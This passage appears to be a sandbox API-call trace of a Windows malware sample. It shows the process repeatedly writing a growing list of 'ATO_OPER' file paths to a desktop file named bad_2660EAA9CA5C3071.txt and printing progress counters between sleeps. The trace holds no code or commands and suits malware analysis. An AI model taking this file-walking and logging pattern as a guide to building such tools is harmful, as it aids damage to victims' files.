lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1247 [0226.209] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\r\n", cchWideChar=1247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1247 [0226.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\r\n", cchWideChar=1247, lpMultiByteStr=0x2876dd8, cbMultiByte=1247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\r\n", lpUsedDefaultChar=0x0) returned 1247 [0226.210] WriteFile (in: hFile=0x20c, lpBuffer=0x2876dd8*, nNumberOfBytesToWrite=0x4df, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x2876dd8*, lpNumberOfBytesWritten=0x2a1fe34*=0x4df, lpOverlapped=0x0) returned 1 [0226.211] CloseHandle (hObject=0x20c) returned 1 [0226.211] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=19 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0226.211] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=19 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=19 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0226.211] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0226.212] Sleep (dwMilliseconds=0x5dc) [0228.408] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=19 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0228.408] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=19 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=19 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0228.408] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0228.409] Sleep (dwMilliseconds=0x5dc) [0230.862] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=19 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0230.862] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=19 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=19 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0230.862] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0230.863] Sleep (dwMilliseconds=0x5dc) [0233.083] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0233.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\WinMail.exe\r\n", cchWideChar=1300, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1300 [0233.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\WinMail.exe\r\n", cchWideChar=1300, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1300 [0233.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\WinMail.exe\r\n", cchWideChar=1300, lpMultiByteStr=0x1f3be08, cbMultiByte=1300, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\WinMail.exe\r\nw", lpUsedDefaultChar=0x0) returned 1300 [0233.086] WriteFile (in: hFile=0x1ec, lpBuffer=0x1f3be08*, nNumberOfBytesToWrite=0x514, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x1f3be08*, lpNumberOfBytesWritten=0x2a1fe34*=0x514, lpOverlapped=0x0) returned 1 [0233.087] CloseHandle (hObject=0x1ec) returned 1 [0233.087] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=20 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0233.087] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=20 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=20 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0233.087] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0233.088] Sleep (dwMilliseconds=0x5dc) [0235.917] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=20 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0235.917] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=20 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=20 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0235.917] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0235.918] Sleep (dwMilliseconds=0x5dc) [0238.734] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=20 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0238.734] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=20 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=20 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0238.734] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0238.736] Sleep (dwMilliseconds=0x5dc) [0240.691] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0240.694] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\WinMail.exe\r\nATO_OPER: C:\\Program Files (x86)\\Adobe\\accupos.exe\r\n", cchWideChar=1352, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1352 [0240.694] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\WinMail.exe\r\nATO_OPER: C:\\Program Files (x86)\\Adobe\\accupos.exe\r\n", cchWideChar=1352, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1352 [0240.694] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\WinMail.exe\r\nATO_OPER: C:\\Program Files (x86)\\Adobe\\accupos.exe\r\n", cchWideChar=1352, lpMultiByteStr=0x1f3be08, cbMultiByte=1352, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\WinMail.exe\r\nATO_OPER: C:\\Program Files (x86)\\Adobe\\accupos.exe\r\n", lpUsedDefaultChar=0x0) returned 1352 [0240.694] WriteFile (in: hFile=0x1d4, lpBuffer=0x1f3be08*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x1f3be08*, lpNumberOfBytesWritten=0x2a1fe34*=0x548, lpOverlapped=0x0) returned 1 [0240.696] CloseHandle (hObject=0x1d4) returned 1 [0240.697] 